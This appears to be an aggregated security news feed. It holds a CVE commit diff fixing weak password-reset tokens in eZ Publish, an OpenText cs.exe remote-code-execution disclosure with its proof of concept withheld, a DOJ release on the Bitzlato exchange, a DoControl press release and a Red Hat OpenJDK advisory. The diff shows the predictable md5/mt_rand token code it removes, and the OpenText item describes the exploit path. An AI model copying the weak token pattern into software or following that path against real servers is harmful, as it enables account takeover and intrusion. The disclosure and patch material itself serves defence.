A vulnerability was found in gitter-badger ezpublish-modern-legacy. It has been rated as problematic. This issue affects some unknown processing of the file kernel/user/forgotpassword.php. The manipulation leads to weak password recovery. Upgrading to version 1.0 is able to address this issue. The name of the patch is 5908d5ee65fec61ce0e321d586530461a210bf2a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-218951.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   In this repository All GitHub
    

*   No suggested jump to results

*   In this repository All GitHub
    
*   In this user All GitHub
    
*   In this repository All GitHub
    

Sign in

Sign up

gitter-badger / **ezpublish-modern-legacy** Public

*   Notifications
*   Fork 0
*   Star 0
    

*   Code
*   Pull requests
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

Permalink

Browse files

Fix EZP-24140: Potential vulnerability in eZ Publish password recovery

Use openssl\_random\_pseudo\_bytes() if available, otherwise fall back to mt\_rand(). Use microtime() for entropy.

*   Loading branch information

glye committed

May 11, 2015

1 parent 7d72ff9 commit 5908d5ee65fec61ce0e321d586530461a210bf2a

Showing **1 changed file** with **5 additions** and **1 deletion**.

6 kernel/user/forgotpassword.php

Show comments View file

@@ -113,7 +113,11 @@

$user = $users\[0\];

$time = time();

$userID = $user\->id();

$hashKey = md5( $userID . ':' . $time . ':' . mt\_rand() );

$hashKey = md5(

$userID . ':' . microtime() . ':' .

( function\_exists( "openssl\_random\_pseudo\_bytes" ) ?

openssl\_random\_pseudo\_bytes( 32 ) : mt\_rand() )

);

  

// Create forgot password object

if ( eZOperationHandler::operationIsAvailable( 'user\_forgotpassword' ) )

**0 comments on commit 5908d5e**

Please sign in to comment.

CVE-2015-10071: Fix EZP-24140: Potential vulnerability in eZ Publish password recovery · gitter-badger/ezpublish-modern-legacy@5908d5e

An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The Common Gateway Interface (CGI) program cs.exe allows an attacker to increase/decrease an arbitrary memory address by 1 and trigger a call to a method of a vftable with a vftable pointer value chosen by the attacker.

There is a vulnerability in the “cs.exe” program of the OpenText™ Content Server component of OpenText™ Extended ECM, which allows an attacker to create an object with a fake “vftable” and execute arbitrary code by abusing a DLL which was compiled without ASLR.

**Vendor description**

_"OpenText™ Extended ECM is an enterprise CMS platform that securely governs the information lifecycle by integrating with leading enterprise applications, such as SAP®, Microsoft® 365, Salesforce and SAP SuccessFactors®. Bringing content and processes together, Extended ECM provides access to information when and where it’s needed, improves decision-making and drives operational effectiveness."_

Source: https://www.opentext.com/products/extended-ecm

**Business recommendation**

The vendor provides a patch which should be installed immediately.

**Vulnerability Overview/Description****1) Pre-authenticated Remote Code Execution in cs.exe (CVE-2022-45923)**

The **Common Gateway Interface (CGI)** program cs.exe of the Content Server has a vulnerability, which allows an attacker to increase/decrease an arbitrary memory address by 1 and to trigger a call to a method of a vftable with a vftable pointer value chosen by the attacker.

The cs.exe does de-serialize (crack) the user provided data in the \`\_fInArgs\` parameter, if the parameter \`\_ApiName\` is set. During this de-serialization to a \`class KOSValue\` object, the function \`obj\_ref\_cracker\` can be called. This function tries to create a new \`class KOSValue\` object with an unknown class ID of \`3\`.

As the class ID is unknown the function returns an object of type KOSValueBaseClass instead of KOSObjRefClass, but the value of the class_ptr attribute of the new class KOSValue object is controlled by the attacker. This new object can then be used to increase/decrease arbitrary memory addresses and call methods of its vftable via the functions KOSValueBaseClass::AddReference and KOSValueBaseClass::ReleaseReference.

**Proof of concept****1) Pre-authenticated Remote Code Execution in cs.exe (CVE-2022-45923)**

The following request crashes the \`CGI\` binary cs.exe with an access violation exception - 0xC0000005 trying to read memory from address 0xAAAA+8:

    [ PoC removed, will be published at a later date ]

There are .dll files (libaprutil-1 & libapriconv-1.dll) which are not compiled with the security flag Address Space Layout Randomization - ASLR enabled, which can be used to achieve remote code execution.

    .\winchecksec.exe --json (get-item C:\OPENTEXT-22\cgi\*.dll) > .\checksec-results.json

    cat checksec-results.json | jq -r '.[] | [.path, .mitigations.aslr.presence] | @csv'
    
    "icudt69.dll","Present"
    "icuin69.dll","Present"
    "icuio69.dll","Present"
    "icutu69.dll","Present"
    "icuuc69.dll","Present"
    "jsoncpp.dll","Present"
    "libapr-1.dll","Present"
    "libapriconv-1.dll","NotPresent"
    "libaprutil-1.dll","NotPresent"
    "libcrypto-1_1-x64.dll","Present"
    "libexpat.dll","Present"
    "libssl-1_1-x64.dll","Present"
    "llcrypt.dll","Present"
    "llisapi.dll","Present"
    "llkernel.dll","Present"
    "llresources.dll","Present"
    "log4cxx.dll","Present"
    "PocoFoundation.dll","Present"

**Vulnerable / tested versions**

The following version has been tested:

*   22.1 (16.2.19.1803)

The following versions are vulnerable according to the vendor:

*   20.4 - 22.3

**Vendor contact timeline**

CVE-2022-45923: Pre-authenticated Remote Code Execution in cs.exe (OpenText™ Server Component)

The founder and majority owner of a cryptocurrency exchange, Bitzlato Ltd. (Bitzlato), was arrested last night in Miami for his alleged operation of a money transmitting business that transported and transmitted illicit funds and that failed to meet U.S. regulatory safeguards, including anti-money laundering requirements. 

Anatoly Legkodymov, 40, a Russian national who resides in Shenzhen, People’s Republic of China, is scheduled to be arraigned this afternoon in the U.S. District Court for the Southern District of Florida. French authorities and the U.S. Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) are taking concurrent enforcement actions.

"Today the Department of Justice dealt a significant blow to the cryptocrime ecosystem," said Deputy Attorney General Lisa O. Monaco. “Overnight, the Department worked with key partners here and abroad to disrupt Bitzlato, the China-based money laundering engine that fueled a high-tech axis of cryptocrime, and to arrest its founder, Russian national Anatoly Legkodymov. Today’s actions send the clear message: whether you break our laws from China or Europe – or abuse our financial system from a tropical island – you can expect to answer for your crimes inside a United States courtroom.”

“As alleged, the defendant helped operate a cryptocurrency exchange that failed to implement required anti-money laundering safeguards and enabled criminals to profit from their wrongdoing, including ransomware and drug trafficking,” said Assistant Attorney General Kenneth A. Polite, Jr. of the Justice Department’s Criminal Division. “The National Cryptocurrency Enforcement Team’s tremendous efforts to disrupt Bitzlato and arrest the defendant demonstrate that we will continue to work with our partners – both foreign and domestic – to combat cryptocurrency-fueled crimes, even if they transcend international borders.”

According to court documents, Legkodymov is a senior executive and the majority shareholder of Bitzlato, a Hong Kong-registered cryptocurrency exchange that operates globally. Bitzlato has marketed itself as requiring minimal identification from its users, specifying that “neither selfies nor passports \[are\] required.” On occasions when Bitzlato did direct users to submit identifying information, it repeatedly allowed them to provide information belonging to “straw man” registrants.

“Institutions that trade in cryptocurrency are not above the law and their owners are not beyond our reach,” said U.S. Attorney Breon Peace for the Eastern District of New York. “As alleged, Bitzlato sold itself to criminals as a no-questions-asked cryptocurrency exchange, and reaped hundreds of millions of dollars’ worth of deposits as a result. The defendant is now paying the price for the malign role that his company played in the cryptocurrency ecosystem.”

As a result of these deficient know-your-customer (KYC) procedures, Bitzlato allegedly became a haven for criminal proceeds and funds intended for use in criminal activity. Bitzlato’s largest counterparty in cryptocurrency transactions was Hydra Market (Hydra), an anonymous, illicit online marketplace for narcotics, stolen financial information, fraudulent identification documents, and money laundering services that was the largest and longest running darknet market in the world. Hydra users exchanged more than $700 million in cryptocurrency with Bitzlato, either directly or through intermediaries, until Hydra was shuttered by U.S. and German law enforcement in April 2022. Bitzlato also received more than $15 million in ransomware proceeds.

“The FBI will continue to pursue actors who attempt to mask their criminal activity behind keyboards and use means such as cryptocurrency to evade law enforcement,” said Assistant Deputy Director Brian Turner of the FBI. “We, along with our federal and international partners, will work relentlessly to disrupt and dismantle these types of criminal enterprises. Today’s arrest should serve as a reminder the FBI will impose risk and consequences upon those who engage in these activities.”

“As alleged today, Legkodymov knowingly allowed Bitzlato to become a perceived safe haven for funds used for and resulting from a variety of criminal activities,” said Assistant Director in Charge Michael J. Driscoll of the FBI New York Field Office. “The FBI and our partners remain steadfast in our commitment to keeping cryptocurrency markets – as with any financial market – free from illicit activity.  Today’s action should serve as an example of this commitment as Legkodymov will now face the consequences of his actions in our criminal justice system.”

As alleged in the complaint, Bitzlato’s customers routinely used the company’s customer service portal to request support for transactions with Hydra, which Bitzlato often provided, and admitted in chats with Bitzlato personnel that they were trading under assumed identities. Moreover, Legkodymov and Bitzlato’s other managers were aware that Bitzlato’s accounts were rife with illicit activity and that many of its users were registered under others’ identities. For instance, on May 29, 2019, Legkodymov used Bitzlato’s internal chat system to write to a colleague that Bitzlato’s users were “known to be crooks,” using others’ identity documents to register their accounts. Legkodymov was repeatedly warned by colleagues that Bitzlato’s customer base consisted of “addicts who buy drugs at \[\] Hydra” and “drug traffickers,” with one senior executive even stressing that Bitzlato should combat drug dealers only “nominally,” to avoid hurting the company’s bottom line. An internal spreadsheet saved in Bitzlato’s shared management folder encapsulated the company’s view of itself: “Positives: No KYC. . . . Negatives: Dirty money. . . .”

As alleged in the complaint, although Bitzlato claimed not to accept users from the United States, it did substantial business with U.S.-based customers, and its customer service representatives repeatedly advised users that they could transfer funds from U.S. financial institutions. Moreover, Legkodymov – who himself administered Bitzlato from Miami in 2022 and 2023 – received reports reflecting substantial traffic to Bitzlato’s website from U.S.-based Internet Protocol addresses, including over 250 million such visits in July 2022.

Legkodymov is charged with conducting an unlicensed money transmitting business. If convicted, he faces a maximum penalty of five years in prison.

Concurrent with the arrest announced today, French authorities, working with Europol and partners in Spain, Portugal, and Cyprus, dismantled Bitzlato’s digital infrastructure, seized Bitzlato’s cryptocurrency, and took other enforcement actions.

In addition, the Treasury Department’s FinCEN announced an Order pursuant to section 9714(a) of the Combating Russian Money Laundering Act, as amended, identifying Bitzlato as a “primary money laundering concern” in connection to Russian illicit finance. The order imposes a special measure prohibiting certain transmittals of funds involving Bitzlato by any covered financial institution.

National Cryptocurrency Enforcement Team (NCET) Trial Attorneys Alexander Mindlin, Scott Meisler, and Matthew Blackwood of the Justice Department’s Criminal Division and Assistant U.S. Attorney Artie McConnell for the Eastern District of New York are prosecuting the case, with assistance from Paralegal Specialist Mary Clare McMahon.

The Justice Department investigated this case in close coordination with French law enforcement authorities and the Treasury Department’s FinCEN, both of which took separate enforcement actions today under their respective authorities. The Justice Department’s Office of International Affairs and the FBI’s Legal Attaché in France provided critical assistance in this case, with significant support from the department’s Cyber Operations International Liaison. The NCET and U.S. Attorney’s Office for the Eastern District of New York also extend their appreciation to the Cyber Division of the Paris Prosecution Office and to France’s Gendarmerie Nationale Cyberspace Command (Cyber Crime Investigation Unit / C3N). Assistance was also provided by the Customs and Border Protection, the Transportation Safety Administration, and the New York City Police Department. EUROPOL and Dutch and Belgian authorities have contributed to the overall investigation with respect to operational expertise, coordination, and information-sharing.

The NCET was established to combat the growing illicit use of cryptocurrencies and digital assets. Under the Criminal Division, the NCET conducts and supports investigations into individuals and entities that enable the use of digital assets to commit and facilitate a variety of crimes, with a particular focus on virtual currency exchanges, mixing and tumbling services, and infrastructure providers. The NCET also sets strategic priorities regarding digital asset technologies, identifies areas for increased investigative and prosecutorial focus, and leads the department’s efforts to collaborate with domestic and foreign government agencies as well as the private sector to aggressively investigate and prosecute crimes involving cryptocurrency and digital assets. 

_A criminal complaint is merely an allegation. All defendants are presumed innocent until proven guilty beyond a reasonable doubt in a court of law._

Founder and Majority Owner of Cryptocurrency Exchange Charged With Processing Over $700 Million of Illicit Funds

New module introduces shadow SaaS application discovery, monitoring, and remediation to protect businesses from supply chain attacks.

**NEW YORK****,** **Jan. 18, 2023** **/PRNewswire/ --** DoControl, the automated Software-as-a-Service (SaaS) security company, today announced a platform expansion with the launch of its comprehensive Shadow Apps solution. Building on prior innovations that address mission-critical use cases, DoControl's newest module introduces shadow SaaS application discovery, monitoring, and remediation to better protect businesses from SaaS supply chain attacks.

SaaS application-to-application connectivity features increase risk by introducing machine identities that are often overprivileged, unsanctioned, and unmonitored. Compromised machine identities can easily gain permission to read, write, and delete sensitive data on improperly managed applications, significantly increasing security, business, and compliance risk for organizations. DoControl's SaaS Security Platform expansion provides complete visibility and control across all sanctioned and unsanctioned SaaS applications to close compliance gaps and remediate supply chain-based attack vectors automatically.

The significant growth of SaaS applications, the demand to integrate them, and the economic pressures to consolidate vendors are contributing to a market need for a single service platform that provides centralized security across disparate applications. Offering CASB, DLP, Insider Risk, Workflows, and now Shadow Apps, DoControl has emerged as the end-to-end SaaS Security platform provider to help security teams do more with less overhead.

The expansion of the DoControl SaaS Security Platform enables comprehensive "shadow application" governance through:

*   **Discovery and Visibility**: Organizations can discover all interconnected first, second, and third-party SaaS applications – sanctioned and unsanctioned – within a business's estate. With a complete mapping and inventory, businesses can identify issues of non-compliance and understand the riskiest SaaS platforms, applications, and users exposed within the SaaS estate.
*   **Monitor and Control**: Organizations can perform application reviews with business users through pre-approval policies and workflows that require end users to provide a business justification to onboard new applications. Security teams can also quarantine suspicious applications, reduce excessive permissions, and revoke or remove applications or access.
*   **Automated Remediation**: Using low-code/no-code tools, organizations can automate security policy enforcement across the entire SaaS application stack. DoControl's Security Workflows reduce exposure introduced by third-party applications and prevent unsanctioned or high-risk application usage through automated remediation of potential threat vectors.

"Data security is paramount, yet many tools lack the granularity and suite of capabilities modern businesses need to secure sensitive data and operations – particularly in the complex and interconnected world of SaaS applications," said Adam Gavish, CEO and Co-founder, DoControl. "Our expanded platform offers a fully unified solution for seamlessly securing both human and machine access so businesses can avoid sensitive data loss, regulatory penalties, and revenue impacts stemming from the mismanagement of the SaaS estate."

The Shadow Applications Module is currently available to existing customers and will enter general availability in Q1 of 2023. To learn more, please review the list of supporting resources below:

*   View the Solutions webpage
*   Register for the Webinar
*   Read the Blog
*   Download the Solution Brief

**About DoControl**

DoControl is an agentless, event-driven SaaS Security Platform that secures business-critical SaaS applications and data. DoControl helps organizations expose their SaaS risk, remediate it quickly, and automatically remediate over time through granular, no-code workflows. DoControl uncovers all SaaS users, third-party collaborators, assets and metadata, OAuth applications, groups, and activity events. DoControl helps reduce risk, prevent data breaches, and mitigate insider risk without slowing down business enablement. To learn more about DoControl, visit www.docontrol.io, read the DoControl blogs, or follow us on Twitter and LinkedIn.

DoControl Announces SaaS Security Platform Expansion With Shadow Apps Module Launch

Red Hat Security Advisory 2023-0202-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: java-11-openjdk security and bug fix update  
Advisory ID:       RHSA-2023:0202-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0202  
Issue date:        2023-01-18  
CVE Names:         CVE-2023-21835 CVE-2023-21843  
====================================================================  
1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
(CVE-2023-21835)

* OpenJDK: soundbank URL remote loading (Sound, 8293742) (CVE-2023-21843)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Prepare for the next quarterly OpenJDK upstream release (2023-01,  
11.0.18) [rhel-9] (BZ#2157798)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2157798 - Prepare for the next quarterly OpenJDK upstream release (2023-01, 11.0.18) [rhel-9] [rhel-9.1.0.z]  
2160421 - CVE-2023-21835 OpenJDK: handshake DoS attack against DTLS connections (JSSE, 8287411)  
2160475 - CVE-2023-21843 OpenJDK: soundbank URL remote loading (Sound, 8293742)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
java-11-openjdk-11.0.18.0.10-2.el9_1.src.rpm

aarch64:  
java-11-openjdk-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-demo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-devel-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-headless-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-jmods-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-src-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-2.el9_1.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-demo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-devel-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-headless-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-jmods-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-src-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-2.el9_1.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-demo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-devel-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-headless-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-jmods-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-src-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-2.el9_1.s390x.rpm

x86_64:  
java-11-openjdk-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-demo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-devel-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-headless-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-javadoc-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-jmods-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-src-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-static-libs-11.0.18.0.10-2.el9_1.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
java-11-openjdk-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-2.el9_1.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-2.el9_1.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-2.el9_1.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-2.el9_1.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-2.el9_1.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-debugsource-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-fastdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-headless-fastdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-headless-slowdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-slowdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-src-fastdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-src-slowdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.18.0.10-2.el9_1.x86_64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.18.0.10-2.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21835  
https://access.redhat.com/security/cve/CVE-2023-21843  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
